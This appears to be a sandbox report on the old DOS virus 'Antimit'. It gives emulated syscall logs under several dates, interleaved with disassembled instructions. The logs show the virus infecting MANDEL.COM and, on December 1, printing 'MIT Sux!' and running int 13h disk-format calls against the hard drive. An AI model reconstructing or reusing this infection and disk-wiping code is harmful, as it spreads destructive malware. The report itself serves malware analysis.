Sample viewer

vx.netlux.org/Virus.DOS.Antimit.x

GIF

Syscalls:

Time	Syscall Op	Syscall Name
2018-12-17T22:42:49.919594161Z	42	PC: 12a94 \| Get date 0x12a94: cmp dh, 0xc 0x12a97: jne 0x12abf 0x12a99: cmp dl, 1 0x12a9c: jne 0x12abf 0x12a9e: mov dx, 0x127 0x12aa1: mov ah, 9 0x12aa3: int 0x21 0x12aa5: mov ah, 5 0x12aa7: mov al, 2 0x12aa9: mov ch, 0 0x12aab: mov dh, 0 0x12aad: mov dl, 0x80 0x12aaf: int 0x13 0x12ab1: mov ah, 6 0x12ab3: int 0x13 0x12ab5: mov ah, 5 0x12ab7: mov dl, 0 0x12ab9: int 0x13 0x12abb: mov ah, 0x4c 0x12abd: int 0x21
2018-12-17T22:42:49.930698637Z	53	PC: 12ad1 \| Get interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-17T22:42:49.932663257Z	37	PC: 12ae2 \| Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-17T22:42:49.933962217Z	26	PC: 12aef \| Set disk transfer address
2018-12-17T22:42:49.93533745Z	78	PC: 12af9 \| Find first file
2018-12-17T22:42:49.942692213Z	79	PC: 12b1e \| Find next file
2018-12-17T22:42:49.945457437Z	79	PC: 12b1e \| Find next file
2018-12-17T22:42:49.948465145Z	79	PC: 12b1e \| Find next file
2018-12-17T22:42:49.951872054Z	79	PC: 12b1e \| Find next file
2018-12-17T22:42:49.954858614Z	79	PC: 12b1e \| Find next file
2018-12-17T22:42:49.957629237Z	67	PC: 12b45 \| Get or set file attributes
2018-12-17T22:42:49.964267675Z	67	PC: 12b4f \| Get or set file attributes
2018-12-17T22:42:49.97981171Z	61	PC: 12b54 \| Open file (Filename = 'MANDEL.COM')
2018-12-17T22:42:49.98668005Z	87	PC: 12b5d \| Get or set file date and time
2018-12-17T22:42:49.989024042Z	63	PC: 12b6f \| Read file or device (Read 474 bytes on handle 5)
2018-12-17T22:42:49.996596275Z	66	PC: 12b80 \| Move file pointer
2018-12-17T22:42:49.998115027Z	64	PC: 12b91 \| Write file or device (Write 290 bytes on handle 5)
2018-12-17T22:42:50.007447686Z	64	PC: 12ba2 \| Write file or device (Write 474 bytes on handle 5)
2018-12-17T22:42:50.015727025Z	66	PC: 12bb3 \| Move file pointer
2018-12-17T22:42:50.017616073Z	44	PC: 12bb9 \| Get time 0x12bb9: mov byte ptr [0x105], dh 0x12bbd: call 0x22a46 0x12bc0: mov ah, 0x40 0x12bc2: mov dx, 0x100 0x12bc5: mov cx, 0x1da 0x12bc8: int 0x21 0x12bca: jb 0x12c0d 0x12bcc: cmp ax, 0x1da 0x12bcf: jne 0x12c0d 0x12bd1: jmp 0x12bde 0x12bd3: mov al, 0 0x12bd5: iret 0x12bd6: sub byte ptr [di + 0x4d88], cl 0x12bda: push bp 0x12bdb: add word ptr [bx + 0x11], dx 0x12bde: mov ax, 0x5701 0x12be1: mov cx, word ptr [0x296] 0x12be5: mov dx, word ptr [0x298] 0x12be9: and cl, 0xe0 0x12bec: or cl, 0x1f
2018-12-17T22:42:50.020930388Z	25	PC: 12a59 \| Get default drive
2018-12-17T22:42:50.022928932Z	14	PC: 12a5f \| Set default drive (Drive = '')
2018-12-17T22:42:50.024612844Z	64	PC: 12bca \| Write file or device (Write 474 bytes on handle 5)
2018-12-17T22:42:50.032994797Z	87	PC: 12bf1 \| Get or set file date and time
2018-12-17T22:42:50.0352006Z	62	PC: 12bf5 \| Close file
2018-12-17T22:42:50.043738686Z	26	PC: 12bfc \| Set disk transfer address
2018-12-17T22:42:50.045306802Z	37	PC: 12c0c \| Set interrupt vector (Interrupt = '36' AKA 'Set random record number')

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":7672,"SideJobID":0}

GIF

Syscalls:

Time	Syscall Op	Syscall Name
2018-12-25T12:02:20.608017826Z	42	PC: 12a94 \| Get date 0x12a94: cmp dh, 0xc 0x12a97: jne 0x12abf 0x12a99: cmp dl, 1 0x12a9c: jne 0x12abf 0x12a9e: mov dx, 0x127 0x12aa1: mov ah, 9 0x12aa3: int 0x21 0x12aa5: mov ah, 5 0x12aa7: mov al, 2 0x12aa9: mov ch, 0 0x12aab: mov dh, 0 0x12aad: mov dl, 0x80 0x12aaf: int 0x13 0x12ab1: mov ah, 6 0x12ab3: int 0x13 0x12ab5: mov ah, 5 0x12ab7: mov dl, 0 0x12ab9: int 0x13 0x12abb: mov ah, 0x4c 0x12abd: int 0x21
2018-12-25T12:02:20.610693224Z	53	PC: 12ad1 \| Get interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T12:02:20.612366018Z	37	PC: 12ae2 \| Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T12:02:20.614005425Z	26	PC: 12aef \| Set disk transfer address
2018-12-25T12:02:20.615563733Z	78	PC: 12af9 \| Find first file
2018-12-25T12:02:20.623200595Z	79	PC: 12b1e \| Find next file
2018-12-25T12:02:20.626452248Z	79	PC: 12b1e \| Find next file (See above)
2018-12-25T12:02:20.629736974Z	79	PC: 12b1e \| Find next file (See above)
2018-12-25T12:02:20.634527136Z	79	PC: 12b1e \| Find next file (See above)
2018-12-25T12:02:20.637748546Z	79	PC: 12b1e \| Find next file (See above)
2018-12-25T12:02:20.640629188Z	67	PC: 12b45 \| Get or set file attributes
2018-12-25T12:02:20.649465848Z	67	PC: 12b4f \| Get or set file attributes
2018-12-25T12:02:20.666882878Z	61	PC: 12b54 \| Open file (Filename = 'MANDEL.COM')
2018-12-25T12:02:20.674202168Z	87	PC: 12b5d \| Get or set file date and time
2018-12-25T12:02:20.677000945Z	63	PC: 12b6f \| Read file or device (Read 474 bytes on handle 5)
2018-12-25T12:02:20.689593328Z	66	PC: 12b80 \| Move file pointer
2018-12-25T12:02:20.691545019Z	64	PC: 12b91 \| Write file or device (Write 290 bytes on handle 5)
2018-12-25T12:02:20.700691606Z	64	PC: 12ba2 \| Write file or device (Write 474 bytes on handle 5)
2018-12-25T12:02:20.710649723Z	66	PC: 12bb3 \| Move file pointer
2018-12-25T12:02:20.712290481Z	44	PC: 12bb9 \| Get time 0x12bb9: mov byte ptr [0x105], dh 0x12bbd: call 0x22a46 0x12bc0: mov ah, 0x40 0x12bc2: mov dx, 0x100 0x12bc5: mov cx, 0x1da 0x12bc8: int 0x21 0x12bca: jb 0x12c0d 0x12bcc: cmp ax, 0x1da 0x12bcf: jne 0x12c0d 0x12bd1: jmp 0x12bde 0x12bd3: mov al, 0 0x12bd5: iret 0x12bd6: sub byte ptr [di + 0x4d88], cl 0x12bda: push bp 0x12bdb: add word ptr [bx + 0x11], dx 0x12bde: mov ax, 0x5701 0x12be1: mov cx, word ptr [0x296] 0x12be5: mov dx, word ptr [0x298] 0x12be9: and cl, 0xe0 0x12bec: or cl, 0x1f
2018-12-25T12:02:20.71493746Z	25	PC: 12a59 \| Get default drive
2018-12-25T12:02:20.717872366Z	14	PC: 12a5f \| Set default drive (Drive = '')
2018-12-25T12:02:20.720025423Z	64	PC: 12bca \| Write file or device (Write 474 bytes on handle 5)
2018-12-25T12:02:20.727967732Z	87	PC: 12bf1 \| Get or set file date and time
2018-12-25T12:02:20.73089815Z	62	PC: 12bf5 \| Close file
2018-12-25T12:02:20.740187637Z	26	PC: 12bfc \| Set disk transfer address
2018-12-25T12:02:20.74171141Z	37	PC: 12c0c \| Set interrupt vector (Interrupt = '36' AKA 'Set random record number')

{"DateBased":true,"Day":1,"Month":12,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":7672,"SideJobID":0}

GIF

Syscalls:

Time	Syscall Op	Syscall Name
2018-12-25T12:02:20.62702436Z	42	PC: 12a94 \| Get date 0x12a94: cmp dh, 0xc 0x12a97: jne 0x12abf 0x12a99: cmp dl, 1 0x12a9c: jne 0x12abf 0x12a9e: mov dx, 0x127 0x12aa1: mov ah, 9 0x12aa3: int 0x21 0x12aa5: mov ah, 5 0x12aa7: mov al, 2 0x12aa9: mov ch, 0 0x12aab: mov dh, 0 0x12aad: mov dl, 0x80 0x12aaf: int 0x13 0x12ab1: mov ah, 6 0x12ab3: int 0x13 0x12ab5: mov ah, 5 0x12ab7: mov dl, 0 0x12ab9: int 0x13 0x12abb: mov ah, 0x4c 0x12abd: int 0x21
2018-12-25T12:02:20.628919758Z	9	PC: 12aa5 \| Display string (String= 'MIT Sux! ')
2018-12-25T12:02:20.633200611Z	76	PC: 12abf \| Terminate with return code (Return code = '2')

{"DateBased":true,"Day":2,"Month":12,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":7672,"SideJobID":0}

GIF

Syscalls:

Time	Syscall Op	Syscall Name
2018-12-25T12:02:20.766957779Z	42	PC: 12a94 \| Get date 0x12a94: cmp dh, 0xc 0x12a97: jne 0x12abf 0x12a99: cmp dl, 1 0x12a9c: jne 0x12abf 0x12a9e: mov dx, 0x127 0x12aa1: mov ah, 9 0x12aa3: int 0x21 0x12aa5: mov ah, 5 0x12aa7: mov al, 2 0x12aa9: mov ch, 0 0x12aab: mov dh, 0 0x12aad: mov dl, 0x80 0x12aaf: int 0x13 0x12ab1: mov ah, 6 0x12ab3: int 0x13 0x12ab5: mov ah, 5 0x12ab7: mov dl, 0 0x12ab9: int 0x13 0x12abb: mov ah, 0x4c 0x12abd: int 0x21
2018-12-25T12:02:20.769443571Z	53	PC: 12ad1 \| Get interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T12:02:20.771491621Z	37	PC: 12ae2 \| Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T12:02:20.772836825Z	26	PC: 12aef \| Set disk transfer address
2018-12-25T12:02:20.774062025Z	78	PC: 12af9 \| Find first file
2018-12-25T12:02:20.78149831Z	79	PC: 12b1e \| Find next file
2018-12-25T12:02:20.784411662Z	79	PC: 12b1e \| Find next file (See above)
2018-12-25T12:02:20.787392647Z	79	PC: 12b1e \| Find next file (See above)
2018-12-25T12:02:20.790972268Z	79	PC: 12b1e \| Find next file (See above)
2018-12-25T12:02:20.794127264Z	79	PC: 12b1e \| Find next file (See above)
2018-12-25T12:02:20.797603749Z	67	PC: 12b45 \| Get or set file attributes
2018-12-25T12:02:20.804952469Z	67	PC: 12b4f \| Get or set file attributes
2018-12-25T12:02:20.831716958Z	61	PC: 12b54 \| Open file (Filename = 'MANDEL.COM')
2018-12-25T12:02:20.840236648Z	87	PC: 12b5d \| Get or set file date and time
2018-12-25T12:02:20.842265162Z	63	PC: 12b6f \| Read file or device (Read 474 bytes on handle 5)
2018-12-25T12:02:20.851514311Z	66	PC: 12b80 \| Move file pointer
2018-12-25T12:02:20.853340828Z	64	PC: 12b91 \| Write file or device (Write 290 bytes on handle 5)
2018-12-25T12:02:20.862823921Z	64	PC: 12ba2 \| Write file or device (Write 474 bytes on handle 5)
2018-12-25T12:02:20.873283931Z	66	PC: 12bb3 \| Move file pointer
2018-12-25T12:02:20.874924687Z	44	PC: 12bb9 \| Get time 0x12bb9: mov byte ptr [0x105], dh 0x12bbd: call 0x22a46 0x12bc0: mov ah, 0x40 0x12bc2: mov dx, 0x100 0x12bc5: mov cx, 0x1da 0x12bc8: int 0x21 0x12bca: jb 0x12c0d 0x12bcc: cmp ax, 0x1da 0x12bcf: jne 0x12c0d 0x12bd1: jmp 0x12bde 0x12bd3: mov al, 0 0x12bd5: iret 0x12bd6: sub byte ptr [di + 0x4d88], cl 0x12bda: push bp 0x12bdb: add word ptr [bx + 0x11], dx 0x12bde: mov ax, 0x5701 0x12be1: mov cx, word ptr [0x296] 0x12be5: mov dx, word ptr [0x298] 0x12be9: and cl, 0xe0 0x12bec: or cl, 0x1f
2018-12-25T12:02:20.877859669Z	25	PC: 12a59 \| Get default drive
2018-12-25T12:02:20.880341512Z	14	PC: 12a5f \| Set default drive (Drive = '')
2018-12-25T12:02:20.881915156Z	64	PC: 12bca \| Write file or device (Write 474 bytes on handle 5)
2018-12-25T12:02:20.88943945Z	87	PC: 12bf1 \| Get or set file date and time
2018-12-25T12:02:20.891703097Z	62	PC: 12bf5 \| Close file
2018-12-25T12:02:20.909482395Z	26	PC: 12bfc \| Set disk transfer address
2018-12-25T12:02:20.910828863Z	37	PC: 12c0c \| Set interrupt vector (Interrupt = '36' AKA 'Set random record number')